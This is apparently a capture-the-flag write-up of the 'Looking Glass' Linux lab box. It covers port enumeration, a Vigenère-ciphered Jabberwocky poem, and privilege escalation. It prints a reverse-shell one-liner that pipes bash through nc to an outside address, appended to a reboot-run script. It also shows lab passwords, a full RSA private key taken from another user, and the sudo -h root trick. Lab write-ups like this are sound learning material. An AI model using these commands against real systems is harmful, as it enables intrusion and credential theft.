This room is a continuation of the Wonderland room we’ve already completed. A medium difficulty, Linux box.
Nmap scan report for 10.10.146.175 Host is up (0.081s latency). Not shown: 916 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 3f:15:19:70:35:fd:dd:0d:07:a0:50:a3:7d:fa:10:a0 (RSA) | 256 a8:67:5c:52:77:02:41:d7:90:e7:ed:32:d2:01:d9:65 (ECDSA) |_ 256 26:92:59:2d:5e:25:90:89:09:f5:e5:e0:33:81:77:6a (ED25519) 9000/tcp open ssh Dropbear sshd (protocol 2.0) | ssh-hostkey: |_ 2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA) 9001/tcp open ssh Dropbear sshd (protocol 2.0) | ssh-hostkey: |_ 2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA) 9002/tcp open ssh Dropbear sshd (protocol 2.0) | ssh-hostkey: |_ 2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA) 9003/tcp open ssh Dropbear sshd (protocol 2.0) | ssh-hostkey: |_ 2048 ff:f4:db:79:a9:bc:b8:8a:d4:3f:56:c2:cf:cb:7d:11 (RSA)
So, initial nmap results give us thousands of of open SSH ports and not much else to go with… There are exploits for Dropbear if we’ve got creds but so far nothing…
If we try to log on to 9000 with SSH using the user name “alice” (testing usernames from the first room, Wonderland) we get a message saying “lower” and if we connect to one of the higher ports we’ll get “higher”. Hopefully it’s expecting us to enumerate the right one.
sh -p 9000 alice@10.10.231.70
The authenticity of host '[10.10.231.70]:9000 ([10.10.231.70]:9000)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.231.70]:9000' (RSA) to the list of known hosts.
Lower
Connection to 10.10.231.70 closed.
ssh -p 13000 guest@10.10.231.70
The authenticity of host '[10.10.231.70]:13000 ([10.10.231.70]:13000)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:3: [hashed name]
~/.ssh/known_hosts:4: [hashed name]
~/.ssh/known_hosts:5: [hashed name]
~/.ssh/known_hosts:6: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.231.70]:13000' (RSA) to the list of known hosts.
Higher
When we connect to port 11418 we get confirmation it’s the right port, and the following emssage.
You've found the real service. Solve the challenge to get access to the box Jabberwocky 'Mdes mgplmmz, cvs alv lsmtsn aowil Fqs ncix hrd rxtbmi bp bwl arul; Elw bpmtc pgzt alv uvvordcet, Egf bwl qffl vaewz ovxztiql. 'Fvphve ewl Jbfugzlvgb, ff woy! Ioe kepu bwhx sbai, tst jlbal vppa grmjl! Bplhrf xag Rjinlu imro, pud tlnp Bwl jintmofh Iaohxtachxta!' Oi tzdr hjw oqzehp jpvvd tc oaoh: Eqvv amdx ale xpuxpqx hwt oi jhbkhe-- Hv rfwmgl wl fp moi Tfbaun xkgm, Puh jmvsd lloimi bp bwvyxaa. Eno pz io yyhqho xyhbkhe wl sushf, Bwl Nruiirhdjk, xmmj mnlw fy mpaxt, Jani pjqumpzgn xhcdbgi xag bjskvr dsoo, Pud cykdttk ej ba gaxt! Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh Ewl vpvict qseux dine huidoxt-achgb! Al peqi pt eitf, ick azmo mtd wlae Lx ymca krebqpsxug cevm. 'Ick lrla xhzj zlbmg vpt Qesulvwzrr? Cpqx vw bf eifz, qy mthmjwa dwn! V jitinofh kaz! Gtntdvl! Ttspaj!' Wl ciskvttk me apw jzn. 'Awbw utqasmx, tuh tst zljxaa bdcij Wph gjgl aoh zkuqsi zg ale hpie; Bpe oqbzc nxyi tst iosszqdtz, Eew ale xdte semja dbxxkhfe. Jdbr tivtmi pw sxderpIoeKeudmgdstd Enter Secret:
We can assume poem is Lewis Carol’s Jabberwocky, the number of letters matches but it looks like it’s been run through a cypher. Initially I explored ROT cyphers but it turns out to be Vignere, and using an automatic tool we can decypher it.
Your secret is bewareTheJabberwock
When we input this we get our first set of creds.
jabberwock:ExaminationWantedComfortablyFrosts
jabberwock@looking-glass:~$ cat user.txt
}32a911966cab2d643f5d57d9e0173d56{mhtWe land straight on the user flag and it is of course backwards…
jabberwock@looking-glass:~$ sudo -l
Matching Defaults entries for jabberwock on looking-glass:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/rebootSudo -l tells us we’re able to run reboot as sudo, so let’s look for a way to privesc. I’m not sure what to do immediately with reboot but running our favourite legume script, linpeas, we see a script in our home directory is executed by the user tweedledum on reboot., so we can stick a reverse shell into the script, open a listener, reboot and cross our fingers.
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh jabberwock@looking-glass:~$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.18.105.64 5555 >/tmp/f" >> twasBrillig.sh
Tweedledum can run /bin/bash as user tweedledee, so we can switch back and forth presumably. Inside our home directory is a series of Sha256 encrypted hashes.
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9 7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed 28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624 b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6 b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0 5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8 7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
From 1 – 7 the are “Maybe one of these is the password” and number 8 I didn’t crack… After a bit of faffing around I discover that hash number 8 isn’t actually SHA256 but hex, and get the following:
the password is zyxwvutsrqponmlk
Humptydumpty doesn’t have any obvious privesc vectors but something I always try is to read /.ssh/id_rsa and we can indeed grab Alice’s ssh key.
humptydumpty@looking-glass:/home$ cat alice/.ssh/id_rsa -----BEGIN RSA PRIVATE KEY----- MIIEpgIBAAKCAQEAxmPncAXisNjbU2xizft4aYPqmfXm1735FPlGf4j9ExZhlmmD NIRchPaFUqJXQZi5ryQH6YxZP5IIJXENK+a4WoRDyPoyGK/63rXTn/IWWKQka9tQ 2xrdnyxdwbtiKP1L4bq/4vU3OUcA+aYHxqhyq39arpeceHVit+jVPriHiCA73k7g HCgpkwWczNa5MMGo+1Cg4ifzffv4uhPkxBLLl3f4rBf84RmuKEEy6bYZ+/WOEgHl fks5ngFniW7x2R3vyq7xyDrwiXEjfW4yYe+kLiGZyyk1ia7HGhNKpIRufPdJdT+r NGrjYFLjhzeWYBmHx7JkhkEUFIVx6ZV1y+gihQIDAQABAoIBAQDAhIA5kCyMqtQj X2F+O9J8qjvFzf+GSl7lAIVuC5Ryqlxm5tsg4nUZvlRgfRMpn7hJAjD/bWfKLb7j /pHmkU1C4WkaJdjpZhSPfGjxpK4UtKx3Uetjw+1eomIVNu6pkivJ0DyXVJiTZ5jF ql2PZTVpwPtRw+RebKMwjqwo4k77Q30r8Kxr4UfX2hLHtHT8tsjqBUWrb/jlMHQO zmU73tuPVQSESgeUP2jOlv7q5toEYieoA+7ULpGDwDn8PxQjCF/2QUa2jFalixsK WfEcmTnIQDyOFWCbmgOvik4Lzk/rDGn9VjcYFxOpuj3XH2l8QDQ+GO+5BBg38+aJ cUINwh4BAoGBAPdctuVRoAkFpyEofZxQFqPqw3LZyviKena/HyWLxXWHxG6ji7aW DmtVXjjQOwcjOLuDkT4QQvCJVrGbdBVGOFLoWZzLpYGJchxmlR+RHCb40pZjBgr5 8bjJlQcp6pplBRCF/OsG5ugpCiJsS6uA6CWWXe6WC7r7V94r5wzzJpWBAoGBAM1R aCg1/2UxIOqxtAfQ+WDxqQQuq3szvrhep22McIUe83dh+hUibaPqR1nYy1sAAhgy wJohLchlq4E1LhUmTZZquBwviU73fNRbID5pfn4LKL6/yiF/GWd+Zv+t9n9DDWKi WgT9aG7N+TP/yimYniR2ePu/xKIjWX/uSs3rSLcFAoGBAOxvcFpM5Pz6rD8jZrzs SFexY9P5nOpn4ppyICFRMhIfDYD7TeXeFDY/yOnhDyrJXcbOARwjivhDLdxhzFkx X1DPyif292GTsMC4xL0BhLkziIY6bGI9efC4rXvFcvrUqDyc9ZzoYflykL9KaCGr +zlCOtJ8FQZKjDhOGnDkUPMBAoGBAMrVaXiQH8bwSfyRobE3GaZUFw0yreYAsKGj oPPwkhhxA0UlXdITOQ1+HQ79xagY0fjl6rBZpska59u1ldj/BhdbRpdRvuxsQr3n aGs//N64V4BaKG3/CjHcBhUA30vKCicvDI9xaQJOKardP/Ln+xM6lzrdsHwdQAXK e8wCbMuhAoGBAOKy5OnaHwB8PcFcX68srFLX4W20NN6cFp12cU2QJy2MLGoFYBpa dLnK/rW4O0JxgqIV69MjDsfRn1gZNhTTAyNnRMH1U7kUfPUB2ZXCmnCGLhAGEbY9 k6ywCnCtTz2/sNEgNcx9/iZW+yVEm/4s9eonVimF+u19HJFOPJsAYxx0 -----END RSA PRIVATE KEY-----
Linpeas tells us that alice can run /bin/bash as sudo but on the host ssalg-gnikool. I spend a significant amount of time trying to discover if there’s another host we can tunnel to, while coming across something on stackexchange explaining that you can use the -h (host) flag in sudo to specify the host, and as alice can run /bin/bash as sudo with no password on ssalg-gnikool we pop straight into a root shell…
alice@looking-glass:/tmp$ sudo -h ssalg-gnikool /bin/bash sudo: unable to resolve host ssalg-gnikool root@looking-glass:/tmp# id uid=0(root) gid=0(root) groups=0(root)
This gives us the root flag and completes the box.
It was a reasonably straight forward box. I didn’t enjoy the initial access mechanic, but it was a bit more fun than the previously themed room. The various priv esc measures where brief, but I learned about sudo on hosts which is handy!